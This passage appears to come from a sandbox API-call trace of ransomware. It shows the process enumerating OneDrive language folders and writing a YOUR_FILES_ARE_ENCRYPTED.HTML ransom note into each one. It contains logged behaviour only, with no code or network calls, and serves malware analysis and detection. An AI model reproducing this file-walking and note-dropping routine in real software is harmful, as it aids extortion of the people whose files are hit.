lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.560] GetProcessHeap () returned 0x600000 [0113.560] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32f02f8 | out: hHeap=0x600000) returned 1 [0113.560] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x803b3583, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x803b3583, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x803b3583, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="ga-ie", cAlternateFileName="")) returned 1 [0113.560] StrStrIW (lpFirst="ga-ie", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.560] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ga-ie") returned 81 [0113.560] GetProcessHeap () returned 0x600000 [0113.560] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.561] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ga-ie" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ga-ie") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ga-ie" [0113.561] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ga-ie", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ga-ie\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ga-ie\\*" [0113.562] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ga-ie\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x803b3583, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x803b3583, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8049848e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x626838 [0113.562] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x803b3583, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x803b3583, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8049848e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.563] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8049848e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8049848e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x805efa75, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x16ac0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.563] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.563] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ga-ie\\FileSync.LocalizedResources.dll.mui") returned 117 [0113.563] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.563] lstrlenW (lpString=".mui") returned 4 [0113.563] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.563] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8049848e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8049848e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x805efa75, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x16ac0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.563] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0113.563] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ga-ie\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0113.563] GetProcessHeap () returned 0x600000 [0113.563] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\ga-ie\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\ga-ie\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0113.563] WriteFile (in: hFile=0x308, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.564] CloseHandle (hObject=0x308) returned 1 [0113.564] GetProcessHeap () returned 0x600000 [0113.564] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.564] GetProcessHeap () returned 0x600000 [0113.564] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.564] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805efa75, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x805efa75, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x805efa75, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="gd", cAlternateFileName="")) returned 1 [0113.564] StrStrIW (lpFirst="gd", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.564] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd") returned 78 [0113.565] GetProcessHeap () returned 0x600000 [0113.565] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.565] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd" [0113.565] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd\\*" [0113.565] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805efa75, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x805efa75, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x806d483e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0113.565] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x805efa75, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x805efa75, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x806d483e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.565] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x806d483e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x806d483e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x80a1bf57, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x180c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.565] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.565] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.565] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.565] lstrlenW (lpString=".mui") returned 4 [0113.565] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.565] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x806d483e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x806d483e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x80a1bf57, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x180c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.565] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0113.565] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.565] GetProcessHeap () returned 0x600000 [0113.565] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.565] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\gd\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0113.566] WriteFile (in: hFile=0x308, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.567] CloseHandle (hObject=0x308) returned 1 [0113.567] GetProcessHeap () returned 0x600000 [0113.567] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.567] GetProcessHeap () returned 0x600000 [0113.567] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.567] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b26d07, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x80b26d07, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x80b26d07, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="gd-latn", cAlternateFileName="")) returned 1 [0113.567] StrStrIW (lpFirst="gd-latn", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.567] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd-latn") returned 83 [0113.567] GetProcessHeap () returned 0x600000 [0113.567] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.567] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd-latn" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd-latn") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd-latn" [0113.567] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd-latn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd-latn\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd-latn\\*" [0113.567] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd-latn\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b26d07, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x80b26d07, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x80e21b0f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x626638 [0113.567] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b26d07, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x80b26d07, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x80e21b0f, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.567] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e21b0f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x80e21b0f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x81928802, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x180c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.567] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.567] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd-latn\\FileSync.LocalizedResources.dll.mui") returned 119 [0113.567] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.567] lstrlenW (lpString=".mui") returned 4 [0113.567] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.567] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80e21b0f, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x80e21b0f, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x81928802, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x180c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.568] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0113.568] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0113.568] GetProcessHeap () returned 0x600000 [0113.568] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.568] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gd-latn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\gd-latn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0113.568] WriteFile (in: hFile=0x308, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.569] CloseHandle (hObject=0x308) returned 1 [0113.569] GetProcessHeap () returned 0x600000 [0113.569] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.569] GetProcessHeap () returned 0x600000 [0113.569] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0113.569] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81928802, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x81928802, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x81928802, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="gl", cAlternateFileName="")) returned 1 [0113.569] StrStrIW (lpFirst="gl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.569] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gl") returned 78 [0113.569] GetProcessHeap () returned 0x600000 [0113.569] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0113.569] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gl" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gl") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gl" [0113.569] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gl", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gl\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gl\\*" [0113.569] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gl\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81928802, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x81928802, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x81a0d6f7, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName=".", cAlternateFileName="")) returned 0x626838 [0113.570] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81928802, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x81928802, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x81a0d6f7, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="..", cAlternateFileName="")) returned 1 [0113.570] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81a0d6f7, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x81a0d6f7, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x81b3eb6a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.570] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.570] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gl\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.570] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.570] lstrlenW (lpString=".mui") returned 4 [0113.570] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.570] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81a0d6f7, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x81a0d6f7, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x81b3eb6a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x160c0, dwReserved0=0x19e010, dwReserved1=0x3d32824, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.570] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0113.570] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gl\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 108 [0113.570] GetProcessHeap () returned 0x600000 [0113.570] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6b05e8 [0113.570] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\gl\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\gl\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0113.570] WriteFile (in: hFile=0x308, lpBuffer=0x6b05e8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6b05e8*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.571] CloseHandle (hObject=0x308) returned 1 [0113.572] GetProcessHeap () returned 0x600000 [0113.572] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b05e8 | out: hHeap=0x600000) returned 1 [0113.572] GetProcessHeap () returned 0x600000 [0113.572] HeapFree (in: hHeap=0x600000, 